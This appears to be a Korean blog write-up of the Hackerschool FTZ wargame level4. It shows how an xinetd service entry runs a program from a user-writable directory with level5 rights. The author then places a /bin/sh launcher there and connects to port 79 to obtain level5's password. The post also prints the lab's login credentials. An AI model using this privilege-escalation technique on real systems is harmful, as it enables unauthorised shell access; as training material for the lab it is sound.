Category : System hacking
Summary : xinetd backdoor
서버에 접속하여 디렉토리에 있는 파일들을 확인한다.
/etc/xinetd.d/ 에 백도어가 있다고 하니 우선 해당디렉토리로 이동해본다.
엄청나게 backdoor처럼 보이는 서비스 파일이 있다.
backdoor라는 파일의 내용을 살펴본다.
finger서비스를 정의하는 파일이다. level5 user의 권한으로 server 프로그램을 실행한다. (확인해보니 기존의 finger service는 disable 되어있다.) finger service는 79를 사용하고 있다.
server 프로그램이 위치한 곳은 level4 user의 홈디렉토리의 하위디렉토리인 tmp 이기 때문에 backdoor라는 프로그램을 작성하여 level5 user의 권한으로 원하는 명령을 수행할 수 있다.
~/tmp에 /bin/sh를 실행하는 backdoor라는 이름의 프로그램을 작성한다.
이제 /etc/service에서 확인했던 finger service가 사용하는 port 인 79번 port에 접속하면 방금 작성한 backdoor프로그램이 실행되어 level5 user의 쉘을 얻게된다.
level5 user의 쉘을 획득하고 패스워드를 얻었다.
| ssh://ftz.hackerschool.org id : level4 pw : suck my brain |
Summary : xinetd backdoor
서버에 접속하여 디렉토리에 있는 파일들을 확인한다.
|
[level4@ftz level4]$ ls -l
|
/etc/xinetd.d/ 에 백도어가 있다고 하니 우선 해당디렉토리로 이동해본다.
| [level4@ftz level4]$ cd /etc/xinetd.d/ [level4@ftz xinetd.d]$ ls backdoor cups-lpd echo ntalk rsh services telnet chargen daytime echo-udp rexec rsync sgi_fam time chargen-udp daytime-udp finger rlogin servers talk time-udp |
엄청나게 backdoor처럼 보이는 서비스 파일이 있다.
backdoor라는 파일의 내용을 살펴본다.
| [level4@ftz xinetd.d]$ cat backdoor service finger { disable = no flags = REUSE socket_type = stream wait = no user = level5 server = /home/level4/tmp/backdoor log_on_failure += USERID } [level4@ftz xinetd.d]$ cat /etc/services | grep finger finger 79/tcp finger 79/udp cfinger 2003/tcp # GNU Finger |
finger서비스를 정의하는 파일이다. level5 user의 권한으로 server 프로그램을 실행한다. (확인해보니 기존의 finger service는 disable 되어있다.) finger service는 79를 사용하고 있다.
server 프로그램이 위치한 곳은 level4 user의 홈디렉토리의 하위디렉토리인 tmp 이기 때문에 backdoor라는 프로그램을 작성하여 level5 user의 권한으로 원하는 명령을 수행할 수 있다.
~/tmp에 /bin/sh를 실행하는 backdoor라는 이름의 프로그램을 작성한다.
|
[level4@ftz tmp]$ cd ~/tmp int main() |
이제 /etc/service에서 확인했던 finger service가 사용하는 port 인 79번 port에 접속하면 방금 작성한 backdoor프로그램이 실행되어 level5 user의 쉘을 얻게된다.
|
[pwn3r@localhost ~]$ nc ftz.hackerschool.org 79 Level5 Password is "what is your name?". |
level5 user의 쉘을 획득하고 패스워드를 얻었다.
'Wargame > FTZ' 카테고리의 다른 글
| Hackerschool FTZ level6 (0) | 2011.07.17 |
|---|---|
| Hackerschool FTZ level5 (1) | 2011.07.17 |
| Hackerschool FTZ level3 (0) | 2011.07.17 |
| Hackerschool FTZ level2 (0) | 2011.07.17 |
| Hackerschool FTZ level1 (0) | 2011.05.29 |
